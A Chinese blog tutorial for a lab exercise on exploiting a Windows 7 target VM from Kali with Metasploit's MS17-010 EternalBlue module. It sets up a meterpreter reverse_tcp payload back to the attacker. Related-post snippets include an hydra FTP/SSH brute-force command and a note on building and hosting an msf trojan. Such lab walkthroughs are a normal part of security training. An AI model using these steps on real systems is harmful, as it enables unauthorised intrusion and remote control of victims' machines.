kali使用msf渗透测试靶机

最新推荐文章于 2024-09-27 09:26:12 发布
最新推荐文章于 2024-09-27 09:26:12 发布
阅读量1.2k 收藏 17
点赞数 3
文章标签: 信息安全 网络安全 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53175607/article/details/121395523
版权

免责声明:只用于靶机测试
1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。

2.使用nmap扫描windones7
在这里插入图片描述3.445端口开放,说明有ms17-010的漏洞。
4.使用命令msfconsole打开msf
在这里插入图片描述5.使用search ms17-010命令查找攻击模块
在这里插入图片描述6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击
use选择

在这里插入图片描述7.show options 配置参数为yes的都要设置。
在这里插入图片描述8..set rhosts [windones7ip]
在这里插入图片描述set lhosts kaliip
9.设置tcp连接set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述10,run攻击建立连接。
在这里插入图片描述提权和文件上传会在下一篇博客中。

Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
baimao__Ch的博客
08-15 1327
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。最后。
我的孤独自学之路----msf靶机
zxc_007_的博客
08-02 370
一、虚拟机安装msf漏洞演练系统靶机 1、下载连接 下载链接: https://sourceforge.net/projects/metasploitable/. 2、解压文件 3、安装 1.配置虚拟机 2.编辑虚拟机配置 根据自己需求更改 之后运行选择 —我已复制该虚拟机 默认账号:密码 msfadmin:msfadmin ...
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
09-27 1141
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
kali渗透metasploitable靶机
热门推荐
浮生若梦的专栏
11-16 2万+
扫描阶段: 工具:Nmap 隐蔽扫描      nmap  -sS 192.168.8.135 端口爆破:FTP、SSH等 工具:Hydra 备用字典 爆破FTP hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135 爆破SSH
利用kali机对metaploitable做渗透攻击
KT986的博客
06-19 1986
仅作学习参考使用 一、虚拟机&&靶机的准备 1)kali linux的安装 https://www.kali.org/get-kali/#kali-virtual-machines 2)Vmware虚拟机的安装 3)靶机metaploitable2的安装 下载地址:https://sourceforge.net.projects/metasploitable/ (如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发本人已经调试好的
CFS三层靶机渗透_Kali
qq_42383069的博客
03-18 5892
环境搭建 0x01. 环境下载: 【CFS三层靶机环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟机网卡(新建两个仅主机模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1058
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机上mysql服务的空密码
xueshenlaila的博客
03-02 3295
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1236
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
Kali使用msf利用漏洞永恒之蓝渗透测win7
2301_76361674的博客
05-01 820
声明!!!!声明!!!!只用于靶机测试!!!
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
4. **网络连通性测试**:在开始渗透测试前,首先要确认渗透机与靶机之间的网络连接,这通常通过`ifconfig`(Linux)或`ipconfig`(Windows)命令获取各自IP地址,然后使用`ping`命令进行测试。 5. **DVWA(Damn ...
记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)
5年编程经验的老猿。
09-23 1万+
很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux? 实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。 Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。...
利用kali对DC-9靶场进行渗透测试
m0_70489261的博客
03-03 563
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。
利用kali下的msf入侵靶机
ro4lsc的博客
01-16 9941
前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 6035
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
利用msf工具对ms08_067漏洞入侵靶机
weixin_63562728的博客
06-27 202
设置 set target 10。​​​​​​​成功!
利用msf靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1450
利用msf靶机metasploittable2 进行信息收集 文章目录利用msf靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
[渗透测试][Kali]对DC-1靶机进行渗透测试
多皮哦的博客
07-15 3766
1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用msfconsole扫描网站目录 5.在msfconsole中查询并尝试针对Drupal的工具 6.数据库操作 7.从网页登陆admin账户 8. 得到flag3之后的操作 9. 使用find命令提升权限
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4167
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作 前提:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马 命令行中参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值